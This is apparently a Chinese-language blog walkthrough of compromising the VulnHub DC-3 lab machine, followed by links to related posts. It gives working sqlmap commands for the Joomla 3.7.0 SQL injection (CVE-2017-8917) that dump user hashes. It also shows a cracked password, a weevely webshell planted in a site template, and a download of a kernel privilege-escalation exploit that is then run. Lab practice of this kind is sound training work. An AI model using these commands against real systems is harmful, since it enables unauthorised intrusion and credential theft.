vulnhub-DC:3靶机渗透记录
准备工作
在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/
导入到vmware
导入的时候遇到一个问题
解决方法:
点 “虚拟机”->“设置”->选择 “磁盘/光驱IDE设备" ->点 ”高级“,
将要 启动设备 设置到 IDE 0:0 上就可以了
打开kali准备进行渗透(ip:192.168.200.6)
信息收集
利用nmap进行ip端口探测
nmap -sS 192.168.200.6/24
探测到ip为192.168.200.14的靶机,开放了80端口,这里吸取到dc2的教训,再用nmap对所有端口进行探测
nmap -sV -p- 192.168.200.14
已经没有别的端口开放了,那就进入网站看看
首页给到的信息是只有一个flag和一个入口,让我们直接获取root权限,简单粗暴
网站用的是Joomla框架,可以使用joomscan工具获取其框架的详细版本信息
再用dirsearch对目录进行扫描看看有没有别的有用信息
dirsearch -u http://192.168.200.14:80
除了个后台登陆页面好像没有别的有用的信息了http://192.168.200.14/administrator/index.php
Joomla
使用joomscan进行扫描,在kali直接下载
apt install joomscan
joomscan -u 192.168.200.14
看到版本是joomla3.7.0
百度到joomla存在sql注入漏洞CVE-2017-8917
但在msf不能直接利用这个漏洞
只能在searchploit中查找关于这个漏洞的利用方法
searchsploit joomla 3.7
可以打开txt文件查看具体的利用方法说明(绝对路径为/usr/share/exploitdb/exploits/php/webapps/42033.txt)
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
直接告诉我们使用sqlmap,payload都写好给你了
漏洞利用——sql注入
使用sqlmap用刚刚得到的payload直接跑
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
得到5个数据库,接下来查看joomladb数据库中的表
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
拿到表名#__users,接下来查看列名
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
拿到列名后就可以看数据了
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]
得到加密的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
去md5在线解密网站也解不出,但应该也是某种hash加密,只能祭出强大的John the Ripper(密码破解工具)
保存一下密码,直接用john爆破
得到密码snoopy
去之前扫到的后台登陆界面登陆后台
漏洞利用——文件上传
在后台管理页面中找到了文件上传的地方,准备测试一下有没有文件上传的漏洞
使用weevely(linux中的蚁剑)工具生成后门木马
weevely generate test test.php
这样就生成了后门木马
但这里的文件上传的地方好像不行,只能在里面创建一个文件,然后将代码复制进去
然后用weevely连接shell(这里的url是test.php的路径)
weevely http://192.168.200.14/templates/beez3/test.php test
连接成功,现在已经拿到一个webshell,但只有www-data权限,开始提权
权限提升
查看内核版本
uname -a
使用linux 4.4.0-21-generic #37-Ubuntu,在网上查找是ubuntu16.04
在searchploit寻找关于ubuntu16.04的权限提升的漏洞
searchsploit ubuntu 16.04 linux
打开文件查看漏洞具体利用方法
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
下载exp到dc3的本地
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
解压 unzip 39772.zip,再解压tar -xvf exploit.tar
接下来就执行刚刚漏洞利用文件演示的代码
./compile.sh
./doubleput
但是我不知道什么情况执行了之后报错,看了看别人的也有一位和我一样卡住不知道什么原因
就差最后一步就可以拿到flag了。。。以后有时间在看看是怎么回事
参考文章
Vulnhub之路Ⅵ——DC-3(最后一步卡住) - 知乎 (zhihu.com)
vulnhub-DC:3靶机渗透记录的更多相关文章
- vulnhub-DC:2靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:5靶机渗透记录
准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:6靶机渗透记录
准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:1靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:4靶机渗透记录
准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...
- vulnhub-DC:7靶机渗透记录
准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...
- vulnhub-DC:8靶机渗透记录
准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-XXE靶机渗透记录
准备工作 在vulnhub官网下载xxe靶机 导入虚拟机 开始进行渗透测试 信息收集 首先打开kali,设置成NAT模式 查看本机ip地址 利用端口扫描工具nmap进行探测扫描 nmap -sS 19 ...
- DC 1-3 靶机渗透
DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...
随机推荐
- Druid数据库连接池基本使用
一.导入Druid的jar包和数据库驱动jar包 二.定义配置文件 与c3p0不同,Druid的配置文件是properties形式的.而且Druid不像c3p0那样可以自动加载配置文件,Druid需要 ...
- HashMap源码解析和设计解读
HashMap源码解析 想要理解HashMap底层数据的存储形式,底层原理,最好的形式就是读它的源码,但是说实话,源码的注释说明全是英文,英文不是非常好的朋友读起来真的非常吃力,我基本上看了差不多 ...
- windows10下JDK9的环境配置
JDK版本:jdk-9.0.4_windows-x64_bin.exe windows版本:windows10 专业版 64位 需要在系统变量中新建如下3个变量: JAVA_HOME=jdk安装路径J ...
- Anno微服务Viper(控制面板) 支持在线部署
1.Anno简介? Anno是一个微服务框架引擎.入门简单.安全.稳定.高可用.全平台可监控.依赖第三方框架少.可在线升级部署. 2.Viper简介 Viper 是一个基于Anno微服务引擎开发的Da ...
- Vue3中toRefs的使用
1 使用reactive 实现数据的响应式 <template> <div> <h2>toRef的使用</h2> <p> 姓名:{{stat ...
- 【Android编程实战】源码级免杀_Dex动态加载技术_Metasploit安卓载荷傀儡机代码复现
/文章作者:MG193.7 CNBLOG博客ID:ALDYS4 QQ:3496925334/ 在读者阅读本文章前,建议先阅读笔者之前写的一篇对安卓载荷的分析文章 [逆向&编程实战]Metasp ...
- OSPF 路由协议
OSPF路由协议 目录 一.OSPF路由协议概述 1.1.内部网关和外部网关协议 1.2.OSPF的工作过程 1.3.OSPF的基本概念 二.OSPF 数据包类型 2.1.OSPF数包 2.2.OSP ...
- 5、修改oracle的字符集
注意:修改字符集前需要将表空间进行数据泵备份: 5.1.修改server端字符集: 1.登录到oracle实例查看字符集: [oracle@slave-node2 ~]$ echo $ORACLE_S ...
- java list 分页
/** * * @param list * @param pageNum * @param pageSize * @param <T> * @return 返回当前页数据 */ publi ...
- 徒手从零实现 uTools 系列(三)- 屏幕取色和截屏
前言 为了进一步提高开发工作效率,最近我们基于 electron 开发了一款媲美 uTools 的开源工具箱 rubick.该工具箱不仅仅开源,最重要的是可以使用 uTools 生态内所有开源插件!这 ...